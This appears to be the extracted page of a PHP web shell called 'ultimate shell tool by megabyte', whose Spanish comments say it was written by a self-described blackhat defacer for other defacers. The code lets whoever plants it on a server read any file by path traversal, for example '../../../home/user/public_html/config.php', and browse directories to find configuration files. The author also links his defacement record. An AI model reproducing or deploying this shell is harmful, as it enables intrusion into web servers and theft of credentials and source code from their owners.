You are on page 1of 4

<?

/*

ultimate shell tool by megabyte 1.0

estas cansado de las shells de revengans,o command tribulation?


estas cansado de no poder navegar en safe mode??
esta herramienta fue creada por un defacer para los defacers,viendo que las shells
populares no cubrian mis necesidades asi que tuve ke krear esta herramienta.

esta shell no pretende sustituir a ninguna de las anteriores,pero es una buena


opcion
tenerla entre tu coleccion de herramientas,cuando todo lo demas falle,por ke no
probar esta tool??

esta disenada usando funciones diferentes a las que siempre vemos en todas las
shells
para poder navegar por mas sistemas sin limitaciones(no mas problemas con
passtru,exec,cmd)
se usan funciones como show source,en vez del tipico cat,declarando variables
externas para una mejor
compatibilidad etc.

si kieres kambiarle los kreditos,me vale verga,puedes ponerle tu nick y decir k tu


la hiciste
y ke yo te robe el codigo,a fin de cuentas si kieres enganarte a ti mismo,alla tu.

pandora te amo

greetx:
nobody,i hate everyone xdd

www.mbytesecurity.org

el maximo exponente blackhat de latinoamerica

*/

// en caso del ke server sea mamon con variables externas

$mode = $_get['mode'];
$cat = $_get['cat'];
$dir = $_get['dir'];

// index inicial: sin opci�n seleccionada

if($mode=="")
{
echo"<title>ultimate shell tool by megabyte 1.0</title>";
echo"<body bgcolor=#000000><center>";
echo"<p><font face=fixedsys size=5><font color=#ff0000>u</font><font
color=#ffffff>ltimate ";
echo"</font><font color=#ff0000>s</font><font color=#ffffff>hell </font>";
echo"<font color=#ff0000>t</font><font color=#ffffff>ool<br>by </font>";
echo"<font color=#ff0000>m</font><font color=#ffffff>egabyte<br>";
echo"</font></font><font color=#ffffff><br>";
echo"&nbsp;</font></p>";
echo"</center>";
echo"<p align=justify><font face=fixedsys color=#ff0000>1.-</font><font
color=#ffffff face=fixedsys><a href=?mode=steal><font color=#3366ff>roba ";
echo"source</font></a>:<br>";
echo"&nbsp;&nbsp;&nbsp; con esto podemos leer en texto plano el c�digo de
cualquier ";
echo"archivo en el servidor (ya sea php, htaccess, logs, etc..). es un
<u>reemplazo</u> ";
echo"del comando &quot;cat archivo.x&quot; de linux. nos sirve cuando queremos
usar una shell y ";
echo"claro... el servidor <u>no nos permite</u> (passtrhu desactivado, etc...) o
debido a que corre bajo windows.<br>";
echo"<br>";
echo"</font><font size=2 face=arial color=#c0c0c0>ejemplo de uso:<br>";
echo"www.sitio.com/utool.php?mode=steal&amp;cat=../../../home/user/public_html/con
fig.php</font></p>";
echo"<p align=left>&nbsp;</p>";
echo"<p align=justify><font face=fixedsys color=#ff0000>2.-</font><font
color=#ffffff face=fixedsys><a href=?mode=list><font color=#3366ff>directory ";
echo"listing</font></a>:<br>";
echo"&nbsp;&nbsp;&nbsp; podemos ver todos los archivos y directorios en una
carpeta. ";
echo"reemplaza el comando &quot;ls&quot;, al igual que antes, cuando no podemos
utilizar shell o cuando corre bajo windows.";
echo"<br>muestra todos los archivos y directorios como enlaces, si presionas uno
de ";
echo"estos enlaces podr�s ver el contenido (c�digo) de dicho archivo. si se trata
de ";
echo"un directorio, te dar� un error.<br>";
echo"nos va a ser muy �til para explorar los directorios y saber donde estan las
";
echo"configuraciones.<br>";
echo"<br>";
echo"</font><font face=fixedsys color=#c0c0c0><u>nota:</u> nos va a indicar en ";
echo"donde se ejecuto el script, a modo de saber cual es la direcci�n de los ";
echo"directorios (en este caso: home/user/public_html/).</font><font color=#ffffff
face=fixedsys><br>";
echo"<br>";
echo"</font><font size=2 face=arial color=#c0c0c0>ejemplo de uso:<br>";
echo"www.sitio.com/utool.php?mode=list&amp;dir=home/user/public_html/</font></p>";
echo"<center>";
echo"<p>&nbsp;</p>";
echo"<p><br><b><font face=courier new size=1 color=#c0c0c0>creado por
megabyte<br><br><br>www.mbytesecurity.org<br>pandora te amo<br>
http://www.zone-
h.org/en/defacements/filter/filter_defacer=megabyte+www.mbyte.tk</font></b></p>";
echo"</center>";
}
elseif($mode=="steal")
{

// modo 1: robar codigo

echo "<html>";
echo "<head>";
echo "<title>robar codigo</title>";
echo "</head>";
echo "<body>";

// si no indicamos archivos, probar el concepto mostrando el codigo de esta tool

if($cat=="")
{
$cat="utool.php";
}

$size=filesize($cat);
$file_size = round($size / 1024 * 100) / 100 . "kb"; //operaciones matematicas
muy complejas
// para tipos como slasher
o hackzatan....
//si no estudiaste no
intententes comprenderlo :)

echo"<body bgcolor=#000000><center><font color=#ff0000 face=fixedsys


size=2>v</font><font color=#ffffff face=fixedsys size=2>iendo <b>$cat</b> -
</font><font color=#ff0000 face=fixedsys size=2>t</font><font color=#ffffff
face=fixedsys size=2>ama�o: <b>$file_size</b></font><table width=94% border=2
bordercolor=#afc6db cellspacing=0 bgcolor=#ffffff style=border-collapse: collapse
cellpadding=0><tr><td>";
$po=show_source($cat);
echo "</td></tr></table><br><b><font face=courier new size=1 color=#c0c0c0>creado
por megabyte<br><br><br>www.mbytesecurity.org<br>pandora te amo<br>
http://www.zone-
h.org/en/defacements/filter/filter_defacer=megabyte+www.mbyte.tk</font></b></cente
r>";
echo "</body></html>";
}
elseif($mode=="list")
{

// modo 2: explorar directorios

echo"<title>directory listing</title>";
$base =
substr($_server['path_translated'],0,strrpos($_server['path_translated'],'/'));

// mostrar contenido de directorio inicial

if($dir=="")
{
$dir="./";
}
$path = $dir;

// funcion simple reconocer archivos (php.net)

function after ($this, $inthat)


{
if (!is_bool(strpos($inthat, $this)))
return substr($inthat, strpos($inthat,$this)+strlen($this));
}

echo "<body bgcolor=#000000><center><font face=fixedsys size=2


color=#ff0000>e</font><font face=fixedsys size=2 color=#ffffff>jecutando
</font><font face=fixedsys size=2 color=#ff0000>e</font><font face=fixedsys size=2
color=#ffffff>n: <b>$base<br></b></font><font face=fixedsys size=2
color=#ff0000>v</font><font face=fixedsys size=2 color=#ffffff>iendo </font><font
face=fixedsys size=2 color=#ff0000>d</font><font face=fixedsys size=2
color=#ffffff>irectorio:<b>$dir</b></font><table width=94% border=2
bordercolor=#afc6db cellspacing=0 bgcolor=#ffffff style=border-collapse: collapse
cellpadding=0><tr><td>";
$dir_handle = @opendir($path) or die("no se pudo abrir $path");
while (false !== ($file = readdir($dir_handle))) {
$link = "<a target=_blank href=utool.php?mode=steal&cat=$dir/$file><font
color=#000080>$file</font></a><br>";
$formato = after('.', $file);

// reconocer posici�n de retroceder

if($formato==".") {
$link = "<i><a href=utool.php?mode=list&dir=$dir/$file>retroceder..</a><br></i>";
}

// muy simple: sin formato, debe ser directorio (aqu� error en directorios con
puntos)

if($formato=="") {
$link = "<a href=utool.php?mode=list&dir=$dir/$file><font
color=#800000>$file</font></a><br>";
}

// mostrar directorio, archivo o retroceder (con colores, claro, para no confundir


xd)

echo "$link";
}
closedir($dir_handle);
echo "</td></tr></table><br><b><font face=courier new size=1 color=#c0c0c0>creado
por megabyte<br><br><br>www.mbytesecurity.org<br>pandora te amo<br>
http://www.zone-
h.org/en/defacements/filter/filter_defacer=megabyte+www.mbyte.tk</font></b></cente
r>";
}
?>

You might also like